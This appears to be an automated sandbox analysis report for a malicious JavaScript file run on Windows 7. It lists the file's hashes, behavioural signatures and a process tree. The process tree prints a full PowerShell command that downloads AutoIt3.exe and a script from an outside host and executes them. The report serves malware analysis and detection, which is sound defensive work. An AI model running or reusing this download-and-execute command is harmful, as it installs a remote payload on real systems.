Analysis
-
max time kernel
119s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20231023-en -
resource tags
arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system -
submitted
30-10-2023 16:20
Static task
static1
Behavioral task
behavioral1
Sample
31102023_0019_fla.js
Resource
win7-20231023-en
4 signatures
150 seconds
General
-
Target
31102023_0019_fla.js
-
Size
135KB
-
MD5
607c2a744dff9a9724c4633a33a90237
-
SHA1
0e0a43c6eed546e7e3f3b103dc78d3d898276481
-
SHA256
a4218e196e98797cf2723e653eac563d824d089df0587e39c3a27ae153ef972b
-
SHA512
17536531685491f87e9179587f7c368c937625582ae08be3e4a8d4f1a0ece33339095daaeeba1ce4b6201f0e125539f1bad815c13f12d90fead96da8ef897b69
-
SSDEEP
1536:BZUTSCM9Cfq7u02PmUVdGXjXl4xc5KTPBoMqS7j8frPWgtZPnCUQrNgZnFFQE/0J:0T9U7hgaX6eerjqlI2IO6Mzqfh
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid Process 1696 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid Process Token: SeDebugPrivilege 1696 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
wscript.exedescription pid Process procid_target PID 1136 wrote to memory of 1696 1136 wscript.exe 28 PID 1136 wrote to memory of 1696 1136 wscript.exe 28 PID 1136 wrote to memory of 1696 1136 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\31102023_0019_fla.js1⤵
- Suspicious use of WriteProcessMemory
PID:1136 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ni 'C:/tepp' -Type Directory -Force;cd 'C:/tepp'; Invoke-WebRequest -Uri 'http://sftp.noheroway.com:443' -OutFile 'AutoIt3.exe' -UserAgent 'curl/7.68.0';Invoke-WebRequest -Uri 'http://sftp.noheroway.com:443/msiydguxwlx' -OutFile 'ydguxwlx.au3' -UserAgent 'curl/7.68.0';start 'AutoIt3.exe' -a 'ydguxwlx.au3'"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1696
-